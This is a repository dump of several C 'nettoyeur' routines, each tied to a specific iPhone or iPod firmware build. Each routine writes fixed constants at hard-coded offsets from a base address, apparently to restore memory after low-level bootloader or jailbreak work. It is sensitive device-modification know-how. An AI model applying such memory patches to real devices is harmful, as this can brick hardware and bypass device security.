| return 0; 53 | } 54 | -------------------------------------------------------------------------------- /iPhone2,1/9B206/netto/nettoyeur.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | #define TARGET_JUMPADDR 0x44000000 4 | 5 | int 6 | main(void) 7 | { 8 | 9 | unsigned i; 10 | 11 | *(unsigned int *)(TARGET_JUMPADDR + 0x2a0cc) = 0x00; 12 | *(unsigned int *)(TARGET_JUMPADDR + 0x2a0d8) = 0x00; 13 | *(unsigned int *)(TARGET_JUMPADDR + 0x2a0dc) = 0x00; 14 | *(unsigned int *)(TARGET_JUMPADDR + 0x2a0e0) = 0x00; 15 | *(unsigned int *)(TARGET_JUMPADDR + 0x2a1d0) = 0xFFFFFFFF; 16 | *(unsigned int *)(TARGET_JUMPADDR + 0x2a1dc) = 0x11; 17 | *(unsigned int *)(TARGET_JUMPADDR + 0x2a2bc) = 0x4FF2A2BC; 18 | *(unsigned int *)(TARGET_JUMPADDR + 0x2a2c0) = 0x4FF2A2BC; 19 | *(unsigned int *)(TARGET_JUMPADDR + 0x2a300) = 0x4FF2A300; 20 | *(unsigned int *)(TARGET_JUMPADDR + 0x2a304) = 0x4FF2A300; 21 | *(unsigned int *)(TARGET_JUMPADDR + 0x2a308) = 0x4FF2A308; 22 | *(unsigned int *)(TARGET_JUMPADDR + 0x2a30c) = 0x4FF2A308; 23 | *(unsigned int *)(TARGET_JUMPADDR + 0x2a314) = 0xFFFFFFFF; 24 | *(unsigned int *)(TARGET_JUMPADDR + 0x2a318) = 0xFFFFFFFF; 25 | *(unsigned int *)(TARGET_JUMPADDR + 0x2a31c) = 0x00; 26 | *(unsigned int *)(TARGET_JUMPADDR + 0x2a330) = 0x4FF2A350; 27 | *(unsigned int *)(TARGET_JUMPADDR + 0x2a340) = 0x4FF2A340; 28 | *(unsigned int *)(TARGET_JUMPADDR + 0x2a344) = 0x4FF2A340; 29 | *(unsigned int *)(TARGET_JUMPADDR + 0x2a348) = 0x4FF2A348; 30 | *(unsigned int *)(TARGET_JUMPADDR + 0x2a34c) = 0x4FF2A348; 31 | *(unsigned int *)(TARGET_JUMPADDR + 0x2a364) = 0x02; 32 | *(unsigned int *)(TARGET_JUMPADDR + 0x2a36c) = 0x00; 33 | *(unsigned int *)(TARGET_JUMPADDR + 0x2a370) = 0x00; 34 | *(unsigned int *)(TARGET_JUMPADDR + 0x2a374) = 0x00; 35 | *(unsigned int *)(TARGET_JUMPADDR + 0x2a378) = 0x00; 36 | *(unsigned int *)(TARGET_JUMPADDR + 0x2a37c) = 0x00; 37 | *(unsigned int *)(TARGET_JUMPADDR + 0x2a380) = 0x00; 38 | 
*(unsigned int *)(TARGET_JUMPADDR + 0x2a384) = 0x00; 39 | *(unsigned int *)(TARGET_JUMPADDR + 0x2a388) = 0x00; 40 | *(unsigned int *)(TARGET_JUMPADDR + 0x2a38c) = 0x00; 41 | *(unsigned int *)(TARGET_JUMPADDR + 0x2a390) = 0x00; 42 | *(unsigned int *)(TARGET_JUMPADDR + 0x2a3b4) = 0x00; 43 | *(unsigned int *)(TARGET_JUMPADDR + 0x2a3b8) = 0x00; 44 | *(unsigned int *)(TARGET_JUMPADDR + 0x2a3e8) = 0xFFFFFFFF; 45 | *(unsigned int *)(TARGET_JUMPADDR + 0x2ad80) = 0x4000; 46 | *(unsigned int *)(TARGET_JUMPADDR + 0x2ad84) = 0x00; 47 | *(unsigned int *)(TARGET_JUMPADDR + 0x2ad88) = 0x1000000; 48 | *(unsigned int *)(TARGET_JUMPADDR + 0x2ae40) = 0x00; 49 | *(unsigned int *)(TARGET_JUMPADDR + 0x2ae60) = 0x00; 50 | *(unsigned int *)(TARGET_JUMPADDR + 0x2afc4) = 0x00; 51 | *(unsigned int *)(TARGET_JUMPADDR + 0x2afe0) = 0x00; 52 | *(unsigned int *)(TARGET_JUMPADDR + 0x2afe4) = 0x00; 53 | *(unsigned int *)(TARGET_JUMPADDR + 0x2afec) = 0x00; 54 | *(unsigned int *)(TARGET_JUMPADDR + 0x2affc) = 0x00; 55 | 56 | return 0; 57 | } 58 | -------------------------------------------------------------------------------- /iPod2,1/8C148/netto/nettoyeur.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | #define TARGET_JUMPADDR 0x0B000000 4 | 5 | int 6 | main (void) 7 | { 8 | *(unsigned int *)(TARGET_JUMPADDR + 0x2504c) = 0xFFFFFFFF; 9 | *(unsigned int *)(TARGET_JUMPADDR + 0x25800) = 0x00; 10 | *(unsigned int *)(TARGET_JUMPADDR + 0x25804) = 0x00; 11 | *(unsigned int *)(TARGET_JUMPADDR + 0x2580c) = 0x00; 12 | *(unsigned int *)(TARGET_JUMPADDR + 0x25810) = 0x00; 13 | *(unsigned int *)(TARGET_JUMPADDR + 0x2581c) = 0x00; 14 | *(unsigned int *)(TARGET_JUMPADDR + 0x25820) = 0x00; 15 | *(unsigned int *)(TARGET_JUMPADDR + 0x25824) = 0x00; 16 | *(unsigned int *)(TARGET_JUMPADDR + 0x25830) = 0x00; 17 | *(unsigned int *)(TARGET_JUMPADDR + 0x25834) = 0x00; 18 | *(unsigned int *)(TARGET_JUMPADDR + 0x25864) = 0x00; 19 | *(unsigned int *)(TARGET_JUMPADDR + 
0x25868) = 0x00; 20 | *(unsigned int *)(TARGET_JUMPADDR + 0x25884) = 0x00; 21 | *(unsigned int *)(TARGET_JUMPADDR + 0x25970) = 0xFF25970; 22 | *(unsigned int *)(TARGET_JUMPADDR + 0x25974) = 0xFF25970; 23 | *(unsigned int *)(TARGET_JUMPADDR + 0x25978) = 0xFF25978; 24 | *(unsigned int *)(TARGET_JUMPADDR + 0x2597c) = 0xFF25978; 25 | *(unsigned int *)(TARGET_JUMPADDR + 0x26d00) = 0x00; 26 | *(unsigned int *)(TARGET_JUMPADDR + 0x26d10) = 0xFFFFFFFF; 27 | *(unsigned int *)(TARGET_JUMPADDR + 0x26d14) = 0xFFFFFFFF; 28 | *(unsigned int *)(TARGET_JUMPADDR + 0x26d28) = 0xFF26D2C; 29 | *(unsigned int *)(TARGET_JUMPADDR + 0x26d40) = 0x02; 30 | *(unsigned int *)(TARGET_JUMPADDR + 0x26d48) = 0x00; 31 | *(unsigned int *)(TARGET_JUMPADDR + 0x26d4c) = 0x00; 32 | *(unsigned int *)(TARGET_JUMPADDR + 0x26d50) = 0x00; 33 | *(unsigned int *)(TARGET_JUMPADDR + 0x26d54) = 0x00; 34 | *(unsigned int *)(TARGET_JUMPADDR + 0x26d58) = 0x00; 35 | *(unsigned int *)(TARGET_JUMPADDR + 0x26d5c) = 0x00; 36 | *(unsigned int *)(TARGET_JUMPADDR + 0x26d60) = 0x00; 37 | *(unsigned int *)(TARGET_JUMPADDR + 0x26d64) = 0x00; 38 | *(unsigned int *)(TARGET_JUMPADDR + 0x26d68) = 0x00; 39 | *(unsigned int *)(TARGET_JUMPADDR + 0x26d6c) = 0x00; 40 | *(unsigned int *)(TARGET_JUMPADDR + 0x26d90) = 0x00; 41 | *(unsigned int *)(TARGET_JUMPADDR + 0x26d94) = 0x00; 42 | *(unsigned int *)(TARGET_JUMPADDR + 0x26dc8) = 0xFF26DC8; 43 | *(unsigned int *)(TARGET_JUMPADDR + 0x26dcc) = 0xFF26DC8; 44 | *(unsigned int *)(TARGET_JUMPADDR + 0x26dd4) = 0xFFFFFFFF; 45 | *(unsigned int *)(TARGET_JUMPADDR + 0x26e10) = 0xFF26E10; 46 | *(unsigned int *)(TARGET_JUMPADDR + 0x26e14) = 0xFF26E10; 47 | *(unsigned int *)(TARGET_JUMPADDR + 0x26e38) = 0x00; 48 | *(unsigned int *)(TARGET_JUMPADDR + 0x26e3c) = 0x00; 49 | *(unsigned int *)(TARGET_JUMPADDR + 0x26e40) = 0x00; 50 | *(unsigned int *)(TARGET_JUMPADDR + 0x26e84) = 0x00; 51 | *(unsigned int *)(TARGET_JUMPADDR + 0x26e98) = 0x00; 52 | *(unsigned int *)(TARGET_JUMPADDR + 0x26e9c) = 0x00; 53 | 
*(unsigned int *)(TARGET_JUMPADDR + 0x26ea0) = 0x00; 54 | *(unsigned int *)(TARGET_JUMPADDR + 0x26ea4) = 0x00; 55 | *(unsigned int *)(TARGET_JUMPADDR + 0x26ea8) = 0x00; 56 | *(unsigned int *)(TARGET_JUMPADDR + 0x26eb4) = 0x00; 57 | *(unsigned int *)(TARGET_JUMPADDR + 0x26ee0) = 0x00; 58 | *(unsigned int *)(TARGET_JUMPADDR + 0x26ee4) = 0x00; 59 | *(unsigned int *)(TARGET_JUMPADDR + 0x26ef4) = 0x00; 60 | *(unsigned int *)(TARGET_JUMPADDR + 0x26f20) = 0x00; 61 | *(unsigned int *)(TARGET_JUMPADDR + 0x26f24) = 0x00; 62 | *(unsigned int *)(TARGET_JUMPADDR + 0x26f2c) = 0x00; 63 | *(unsigned int *)(TARGET_JUMPADDR + 0x26f30) = 0x00; 64 | *(unsigned int *)(TARGET_JUMPADDR + 0x26f34) = 0x00; 65 | *(unsigned int *)(TARGET_JUMPADDR + 0x26f38) = 0x00; 66 | *(unsigned int *)(TARGET_JUMPADDR + 0x26f3c) = 0x00; 67 | *(unsigned int *)(TARGET_JUMPADDR + 0x26f40) = 0x00; 68 | *(unsigned int *)(TARGET_JUMPADDR + 0x26f44) = 0x00; 69 | *(unsigned int *)(TARGET_JUMPADDR + 0x26f48) = 0x00; 70 | *(unsigned int *)(TARGET_JUMPADDR + 0x26f4c) = 0x00; 71 | *(unsigned int *)(TARGET_JUMPADDR + 0x26f50) = 0x00; 72 | *(unsigned int *)(TARGET_JUMPADDR + 0x26f54) = 0x00; 73 | *(unsigned int *)(TARGET_JUMPADDR + 0x26f58) = 0x00; 74 | *(unsigned int *)(TARGET_JUMPADDR + 0x26f5c) = 0x00; 75 | 76 | return 0; 77 | } 78 | --------------------------------------------------------------------------------
/iPhone4,1/9B206/netto/nettoyeur.c:
--------------------------------------------------------------------------------
/* NOTE(review): the header name after #include was lost when this page was
 * extracted; main() below references no library symbol. */
#include

/* Base address every store in main() is offset from. */
#define TARGET_JUMPADDR 0x84000000

/*
 * Store fixed 32-bit constants at hard-coded offsets from TARGET_JUMPADDR.
 *
 * Nothing is read, computed or validated: every offset and value is a
 * literal, and the file lives under a device/build directory
 * (iPhone4,1 / 9B206), so the table only makes sense against that exact
 * image. Applied to any other image the same stores would land on
 * unrelated memory.
 *
 * Presumably this puts writable data of an image copy located at
 * TARGET_JUMPADDR back to known values ("nettoyeur" is French for
 * "cleaner") -- TODO confirm against make_nettoyeur.c, which the repository
 * tree lists next to these files.
 *
 * Build context: the Makefile for this directory compiles with -c -Os and
 * extracts a raw binary with objcopy, so this is not a hosted program. The
 * stores go through plain, non-volatile pointers formed from integer
 * constants (implementation-defined conversion), which leaves the compiler
 * free to merge or reorder them.
 *
 * Returns 0 unconditionally.
 */
int
main(void)
{

    unsigned i; /* never referenced in this function */

    /* Two isolated words outside the 0x39xxx run that follows; what they
     * represent is not visible from this file. */
    *(unsigned int *)(TARGET_JUMPADDR + 0x16254) = 0xFB50F7FF;
    *(unsigned int *)(TARGET_JUMPADDR + 0x376bc) = 0x9FF18C6D;
    *(unsigned int *)(TARGET_JUMPADDR + 0x39308) = 0xE000000;
    *(unsigned int *)(TARGET_JUMPADDR + 0x3931c) = 0xE000000;
    *(unsigned int *)(TARGET_JUMPADDR + 0x39358) = 0xE000001;
    *(unsigned int *)(TARGET_JUMPADDR + 0x393f8) = 0xFFFFFFFF;
    *(unsigned int *)(TARGET_JUMPADDR + 0x39400) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x39404) = 0xFFFFFFFF;
    *(unsigned int *)(TARGET_JUMPADDR + 0x39408) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x39414) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x39418) = 0x01;
    /* Pairs of adjacent words that both receive 0x9FF00000 + the offset of
     * the first word. NOTE(review): looks like self-referential next/prev
     * pairs (empty list heads) for an image addressed at base 0x9FF00000 --
     * confirm. */
    *(unsigned int *)(TARGET_JUMPADDR + 0x3941c) = 0x9FF3941C;
    *(unsigned int *)(TARGET_JUMPADDR + 0x39420) = 0x9FF3941C;
    *(unsigned int *)(TARGET_JUMPADDR + 0x39460) = 0x9FF39460;
    *(unsigned int *)(TARGET_JUMPADDR + 0x39464) = 0x9FF39460;
    *(unsigned int *)(TARGET_JUMPADDR + 0x39468) = 0x9FF39468;
    *(unsigned int *)(TARGET_JUMPADDR + 0x3946c) = 0x9FF39468;
    *(unsigned int *)(TARGET_JUMPADDR + 0x39544) = 0xFFFFFFFF;
    *(unsigned int *)(TARGET_JUMPADDR + 0x39548) = 0xFFFFFFFF;
    *(unsigned int *)(TARGET_JUMPADDR + 0x3954c) = 0x00;
    /* Unlike the pairs around it, this word refers to offset 0x39580, not
     * to its own location. */
    *(unsigned int *)(TARGET_JUMPADDR + 0x39560) = 0x9FF39580;
    *(unsigned int *)(TARGET_JUMPADDR + 0x39570) = 0x9FF39570;
    *(unsigned int *)(TARGET_JUMPADDR + 0x39574) = 0x9FF39570;
    *(unsigned int *)(TARGET_JUMPADDR + 0x39578) = 0x9FF39578;
    *(unsigned int *)(TARGET_JUMPADDR + 0x3957c) = 0x9FF39578;
    *(unsigned int *)(TARGET_JUMPADDR + 0x39594) = 0x02;
    /* Ten consecutive words, 0x3959c through 0x395c0, set to zero. */
    *(unsigned int *)(TARGET_JUMPADDR + 0x3959c) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x395a0) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x395a4) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x395a8) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x395ac) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x395b0) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x395b4) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x395b8) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x395bc) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x395c0) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x395e4) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x395e8) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x39618) = 0xFFFFFFFF;
    *(unsigned int *)(TARGET_JUMPADDR + 0x39660) = 0x4000;
    *(unsigned int *)(TARGET_JUMPADDR + 0x39664) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x39668) = 0x1000000;
    *(unsigned int *)(TARGET_JUMPADDR + 0x396e8) = 0xFFFFFFFF;
    /* Everything from here to the end of the function writes zero, at
     * scattered rather than contiguous offsets. */
    *(unsigned int *)(TARGET_JUMPADDR + 0x39740) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x39760) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x397f0) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x39868) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x39874) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x39878) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x39880) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x39884) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x3988c) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x39890) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x39898) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x3989c) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x398a4) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x398a8) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x398b0) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x398b4) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x398f8) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x398fc) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x39904) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x39908) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x39a00) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x39a04) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x39a0c) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x39a10) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x39a18) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x39a1c) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x39a24) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x39a28) = 0x00;

    return 0;
}
--------------------------------------------------------------------------------
/iPod4,1/8J2/netto/nettoyeur.c:
--------------------------------------------------------------------------------
/* NOTE(review): the header name after #include was lost when this page was
 * extracted; main() below references no library symbol. */
#include

/* Base address every store in main() is offset from. */
#define TARGET_JUMPADDR 0x44000000

/*
 * Store fixed 32-bit constants at hard-coded offsets from TARGET_JUMPADDR.
 *
 * Nothing is read, computed or validated: every offset and value is a
 * literal, and the file lives under a device/build directory
 * (iPod4,1 / 8J2), so the table only makes sense against that exact image.
 * Applied to any other image the same stores would land on unrelated
 * memory.
 *
 * Presumably this puts writable data of an image copy located at
 * TARGET_JUMPADDR back to known values ("nettoyeur" is French for
 * "cleaner") -- TODO confirm against make_nettoyeur.c, which the repository
 * tree lists next to these files.
 *
 * Build context: the Makefile for this directory compiles with -c -Os and
 * extracts a raw binary with objcopy, so this is not a hosted program. The
 * stores go through plain, non-volatile pointers formed from integer
 * constants (implementation-defined conversion), which leaves the compiler
 * free to merge or reorder them.
 *
 * Returns 0 unconditionally.
 */
int
main (void)
{
    *(unsigned int *)(TARGET_JUMPADDR + 0x34144) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x3416c) = 0x01;
    *(unsigned int *)(TARGET_JUMPADDR + 0x3417c) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x34188) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x3418c) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x34190) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x34264) = 0xFFFFFFFF;
    *(unsigned int *)(TARGET_JUMPADDR + 0x3426c) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x34270) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x34274) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x34278) = 0xFFFFFFFF;
    *(unsigned int *)(TARGET_JUMPADDR + 0x3427c) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x34288) = 0x00;
    /* Pairs of adjacent words that both receive 0x5FF00000 + the offset of
     * the first word. NOTE(review): looks like self-referential next/prev
     * pairs (empty list heads) for an image addressed at base 0x5FF00000 --
     * confirm. */
    *(unsigned int *)(TARGET_JUMPADDR + 0x34790) = 0x5FF34790;
    *(unsigned int *)(TARGET_JUMPADDR + 0x34794) = 0x5FF34790;
    *(unsigned int *)(TARGET_JUMPADDR + 0x34798) = 0x5FF34798;
    *(unsigned int *)(TARGET_JUMPADDR + 0x3479c) = 0x5FF34798;
    *(unsigned int *)(TARGET_JUMPADDR + 0x347a0) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x347a8) = 0xFFFFFFFF;
    *(unsigned int *)(TARGET_JUMPADDR + 0x347ac) = 0xFFFFFFFF;
    *(unsigned int *)(TARGET_JUMPADDR + 0x347b0) = 0x00;
    /* Unlike the pairs around it, this word refers to the word that
     * follows it (offset 0x347c4), not to its own location. */
    *(unsigned int *)(TARGET_JUMPADDR + 0x347c0) = 0x5FF347C4;
    *(unsigned int *)(TARGET_JUMPADDR + 0x347d8) = 0x02;
    /* Ten consecutive words, 0x347e0 through 0x34804, set to zero. */
    *(unsigned int *)(TARGET_JUMPADDR + 0x347e0) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x347e4) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x347e8) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x347ec) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x347f0) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x347f4) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x347f8) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x347fc) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x34800) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x34804) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x34828) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x3482c) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x34858) = 0x5FF34858;
    *(unsigned int *)(TARGET_JUMPADDR + 0x3485c) = 0x5FF34858;
    *(unsigned int *)(TARGET_JUMPADDR + 0x34860) = 0x5FF34860;
    *(unsigned int *)(TARGET_JUMPADDR + 0x34864) = 0x5FF34860;
    *(unsigned int *)(TARGET_JUMPADDR + 0x3486c) = 0xFFFFFFFF;
    *(unsigned int *)(TARGET_JUMPADDR + 0x34870) = 0x01;
    *(unsigned int *)(TARGET_JUMPADDR + 0x34880) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x34884) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x34888) = 0x60A0100;
    *(unsigned int *)(TARGET_JUMPADDR + 0x3489c) = 0x5FF3489C;
    *(unsigned int *)(TARGET_JUMPADDR + 0x348a0) = 0x5FF3489C;
    /* Everything from here to the end of the function writes zero, at
     * scattered rather than contiguous offsets. */
    *(unsigned int *)(TARGET_JUMPADDR + 0x34940) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x34944) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x34948) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x34988) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x349c0) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x34af4) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x34af8) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x34afc) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x34b04) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x34b08) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x34b10) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x34b20) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x34b24) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x34b28) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x34b2c) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x34b34) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x34b38) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x34b40) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x34b44) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x34b48) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x34b50) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x34b54) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x34b5c) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x34b6c) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x34b70) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x34b74) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x34b78) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x34b8c) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x34b90) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x34b94) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x34b9c) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x34ba0) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x34ba8) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x34bb8) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x34bbc) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x34bc0) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x34bc4) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x34bcc) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x34bd0) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x34bd8) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x34bdc) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x34be0) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x34be8) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x34bec) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x34bf4) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x34c04) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x34c08) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x34c0c) = 0x00;
    *(unsigned int *)(TARGET_JUMPADDR + 0x34c10) = 0x00;

    return 0;
}
--------------------------------------------------------------------------------